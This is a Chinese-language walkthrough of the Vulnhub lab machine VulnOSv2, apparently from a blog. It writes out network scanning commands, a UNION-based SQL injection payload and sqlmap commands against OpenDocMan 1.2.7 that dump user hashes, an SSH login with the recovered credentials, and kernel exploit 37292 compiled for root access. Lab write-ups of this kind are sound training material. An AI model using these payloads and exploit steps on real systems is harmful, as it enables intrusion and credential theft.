VulnOSv2 write up

  • 0x00 环境搭建
    • 0x01 信息收集
  • 0x02 漏洞挖掘
    • web思路
    • 步骤一:枚举目录+主页挖掘
    • 步骤二:OpenDocMan v1.2.7 cms利用
    • 步骤三:尝试利用账号面ssh连接webmin
  • 0x03 提权
    • 步骤四:内核漏洞提权
  • 0x04 总结

0x00 环境搭建


VritualBox配置网络为 host-only
VMware中kali加入 host-only 为Virtual Box的网卡

开启虚拟机报错 usb 2.0 什么的问题
修改usb设备为1.0

0x01 信息收集

  • ip探测
    netdiscover -i eth1 -r 192.168.56.0/24

100是网关 101 是win10 104就是靶机

  • 端口服务识别

masscan -p 1-65535 --rate=1000 192.168.56.104

nmap -sC -sV -A -p 80,6667 192.168.56.104 -o port.txt

开启了
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))

6667/tcp open irc ngircd

OS details: Linux 3.2 - 4.9

0x02 漏洞挖掘

web思路

目录枚举 查看各个功能点 源码
手工+ 扫描器 cms

步骤一:枚举目录+主页挖掘

(1)kali dirsearch dirbuster 枚举
(2)审查主页各功能点


在这里发现一处隐藏目录 /jabcd0cs/

访问 http://192.168.56.104/jabcd0cs/

好像存在cms

步骤二:OpenDocMan v1.2.7 cms利用

(1)搜索OpenDocMan v1.2.7 cms漏洞

searchsploit OpenDocMan 1.2.7

searchsploit -m 32075

拷贝到当前目录

cat 32075.txt 查看利用方法

(2) 利用 漏洞

exp

http://[host]/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,version%28%29,3,4,5,6,7,8,9

爆表名

http://192.168.56.104/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user UNION SELECT 1,group_concat(table_name),3,4,5,6,7,8,9 from information_schema.tables where table_schema=database()

直接用sqlmap吧

爆库名

sqlmap -u "http://192.168.56.104/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -p add_value --dbs --level 3 --batch

爆表名

sqlmap -u “http://192.168.56.104/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user” -p add_value --level 3 --batch -D jabcd0cs --tables

爆可能存在账号密码的字段名

sqlmap -u “http://192.168.56.104/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user” -p add_value --level 3 --batch -D jabcd0cs -T odm_user --columns

爆username和password的字段值

sqlmap -u “http://192.168.56.104/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user” -p add_value --level 3 --batch -D jabcd0cs -T odm_user -C username,password --dump


webmin | b78aae356709f8c31118ea613980954b |
| guest | 084e0343a0486ff05530df6c705c8bb4 (guest)

步骤三:尝试利用账号面ssh连接webmin

登录成功

0x03 提权

思路
内核漏洞提权
翻/bin/bash 用户的 文件找密码

步骤四:内核漏洞提权

(1) 查看exp
./linux-exploit-suggester.sh -u “Linux VulnOSv2 3.13.0-24-generic #47-Ubuntu SMP Fri May 2 23:31:42 UTC 2014 i686 i686 i686 GNU/Linux”


发现 dirtycow 和37292均可

(2) 下载 exp

searchsploit -m 3729


(3) gcc 编译 运行
gcc -o exp 37292.c

./exp

提权成功

之后尝试 dirty cow 40839.c的时候 把靶机搞崩了
还是有其他的先试其他的吧

0x04 总结

本靶机 比较简单
通过OpenDocMan 数据库管理系统存在的 sql注入漏洞 获取到 账号密码, 尝试登录ssh成功 直接 利用内核漏洞37292提权成功

Vulnhub 靶机 VulnOSv2 write up opendocman cms 32075 sql注入 账号密码 ssh连接 37292.c 脏牛提权相关推荐

  1. [VulnHub靶机]Lampiao_脏牛提权

    文章目录 环境介绍 实验步骤 1. 扫描端口 2. 信息收集 3. ssh爆破 4. drupal 7 漏洞getshell 5. 脏牛提权 环境介绍 攻击机:kali(192.168.56.104) ...

  2. 【vulnhub】Lampiao渗透实战(脏牛提权)

    总结 1.该靶机的WEB系统的建站CMS是drupal 7,时刻关注一些cms漏洞 2.在没有思路的时候,try yourself !往往有不同的收获 3.再练练脏牛提权... Lampiao靶机百度 ...

  3. 【甄选靶场】Vulnhub百个项目渗透——项目三十八:Tommy-Boy-1(修改UA,脏牛提权)

    Vulnhub百个项目渗透 Vulnhub百个项目渗透--项目三十八:Tommy-Boy-1(修改UA,脏牛提权) 这个靶场被我打坏了,忘记快照了,自行官网下载哈~~

  4. 【甄选靶场】Vulnhub百个项目渗透——项目十六:FristiLeaks_1.3(文件上传,py脚本改写,sudo提权,脏牛提权,源码获取)

    Vulnhub百个项目渗透 Vulnhub百个项目渗透--项目十六:FristiLeaks_1.3(文件上传,py脚本改写,sudo提权,脏牛提权,源码获取) 靶场地址

  5. 全网最详细的渗透测试靶机实操步骤——vulnhub靶机实战(七)IMF【包含了sql注入,文件上传,gif图片木马制作,缓冲区溢出漏洞sploit等诸多知识点的靶机,超多干货】

    靶机地址:https://www.vulnhub.com/entry/imf-1,162/ 靶机难度:中级(CTF) 靶机发布日期:2016年10月30日 靶机描述:欢迎使用" IMF&qu ...

  6. 74CMS(骑士CMS) 存在SQL注入漏洞(CNVD-2021-43389)

    文章目录 74CMS(骑士CMS) 存在SQL注入漏洞(CNVD-2021-43389) 1.74CMS(骑士CMS)简介 2.漏洞描述 3.影响版本 4.fofa查询语句 5.漏洞复现 6.POC& ...

  7. 齐博cms最新SQL注入网站漏洞 可远程执行代码提权

    齐博cms整站系统,是目前建站系统用的较多的一款CMS系统,开源,免费,第三方扩展化,界面可视化的操作,使用简单,便于新手使用和第二次开发,受到许多站长们的喜欢.开发架构使用的是php语言以及mysq ...

  8. 帝国cms后台登录用户名账号密码忘记了怎么重置找回?

    帝国cms后台登录账号密码是我们登录网站后台的关键密钥,那么如果忘记了,我们如何重置用户名密码,或者怎么找回用户名账号和密码?下面请看教程 1.浏览器登录phpMyAdmin控制界面,输入账号密码登录 ...

  9. 熊海CMS网站SQL注入、XSS攻击、cookie篡改

    CMS下载地址:https://www.jb51.net/codes/303119.html 代码审计,篡改cookie登录管理员界面 通过信息搜集找到了网站的源码 this.location='?r ...

最新文章

  1. 百度搜索关键字如何排名?“网站SEO”告诉你答案
  2. java中ajax删除,ajax删除 post方法
  3. ExtJS专题-TreePanel(1)
  4. 两条边延长角会有什么变化_叶片锁是什么样的 叶片锁使用方法【详解】
  5. Android应用开发—LayoutParams的用法
  6. Nature长文:打破AI黑盒的“持久战”
  7. python 日志不会按照日期分割_python 按照日期切分大日志文件(重点)和按照指定大小切分日志文件...
  8. 创建表结构相同的表,表结构相同的表之间复制数据,Oracle 中 insert into XXX select from 的用法...
  9. 关于fsockopen pfsockopen函数被禁用的解决方法
  10. 【报告分享】2019双11洞察报告资料包(含6大权威报告下载链接)
  11. 使用rsync+inotify+apache做分布式图片服务器的部署方法
  12. 20160801java学习重点:函数
  13. DLAN 连接和使用体验——Twonky
  14. 《史上最简单的 SpringCloud 教程》系列 (转载 http://blog.csdn.net/forezp/article/details/70148833 本文出自方志朋的博客)
  15. 小说阅读APP开发定制搭建方案
  16. en开头的单词_英语四级en-词汇前后缀解析
  17. 【古墓射手】隐私政策
  18. Code review是个数学问题:从二向箔说起
  19. Leaflet 和 Cesium 加载纠偏后高德地图在线瓦片,高德地图最新最全在线瓦片地址
  20. 计算机组成原理Rsel什么意思,el-jy-ⅱ 计算机组成原理第二套 实验十二

热门文章

  1. 华为P30震撼来袭!刘海屏+麒麟980+3650mAh,网友直呼:年度机皇呀
  2. 【Zotero】与坚果云配合使用同步失败解决方法
  3. DAX :表值函数 ADDCOLUMNS 和 SELECTCOLUMNS
  4. 分享塑胶模具设计思路与流程,建议收藏!
  5. 极智装修知识|如何将效果图转化为实景的家? - 分享3
  6. 有一个班4个学生,5门课程①求第1门课程的平均分;②找出有两门以上课程不及格的学生,输出他们的学号和全部课程成绩及平均成绩;③找出平均成绩在90分以上或全部课程成绩在85分以上的学生分别编3个函数实
  7. 网页简单整合Skype
  8. 利用反射动态修改 EasyPoi 导出Excel表格标题名称
  9. JavaScript 数组对象切片
  10. 做出正确选择 重设精彩人生